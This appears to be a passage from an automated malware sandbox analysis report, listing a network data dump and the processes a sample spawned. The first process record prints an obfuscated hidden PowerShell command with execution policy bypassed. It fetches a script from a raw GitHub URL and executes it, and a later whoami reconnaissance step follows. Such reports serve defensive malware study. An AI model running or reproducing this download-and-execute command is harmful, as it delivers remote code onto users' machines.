          2024-12-13 09:38:21 UTC1378INData Raw: 76 5a 59 65 68 53 38 35 67 50 6d 71 75 55 4b 71 65 50 6a 37 72 70 39 54 36 51 56 54 41 4e 6b 77 36 4b 48 77 46 78 42 54 74 6d 4a 28 24 33 76 4f 36 59 44 32 30 34 59 75 39 67 68 31 78 66 68 31 4c 31 4b 70 68 58 62 36 70 73 73 32 48 78 47 42 64 61 5a 78 68 34 50 6d 37 70 67 37 5a 34 59 71 6e 53 63 61 59 38 32 4c 6d 31 65 34 5a 75 41 47 6a 57 31 51 59 70 7a 30 37 54 41 70 37 51 38 53 4d 4e 55 4c 68 57 6c 67 59 34 70 52 34 4e 52 45 55 71 33 4e 72 30 72 62 65 63 37 6a 7a 67 66 43 31 68 6d 75 4d 42 65 6e 7a 6f 53 31 6a 79 67 6c 30 70 50 4f 56 44 33 36 64 47 68 59 51 58 78 69 69 42 50 4a 4d 65 30 32 4a 34 47 45 47 39 6e 47 73 43 64 72 49 36 30 37 44 6a 37 6a 36 6d 6b 77 65 4b 34 53 77 74 34 4f 62 45 37 53 4b 59 46 48 46 4e 44 4f 6a 46 4e 57 69 70 72 55 53 64 6b
          Data Ascii: vZYehS85gPmquUKqePj7rp9T6QVTANkw6KHwFxBTtmJ($3vO6YD204Yu9gh1xfh1L1KphXb6pss2HxGBdaZxh4Pm7pg7Z4YqnScaY82Lm1e4ZuAGjW1QYpz07TAp7Q8SMNULhWlgY4pR4NREUq3Nr0rbec7jzgfC1hmuMBenzoS1jygl0pPOVD36dGhYQXxiiBPJMe02J4GEG9nGsCdrI607Dj7j6mkweK4Swt4ObE7SKYFHFNDOjFNWiprUSdk


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:04:38:13
          Start date:13/12/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w h -ep Bypass -c "$url='https'+'://raw.gi'+'thub.com/k53xupn43/i965652f/refs/heads/main/m.ps1';$pl=iwr $url;iex $pl"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:1
          Start time:04:38:13
          Start date:13/12/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:3
          Start time:04:38:23
          Start date:13/12/2024
          Path:C:\Windows\System32\whoami.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\whoami.exe"
          Imagebase:0x7ff7d2940000
          File size:73'728 bytes
          MD5 hash:A4A6924F3EAF97981323703D38FD99C4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Disassembly

          No disassembly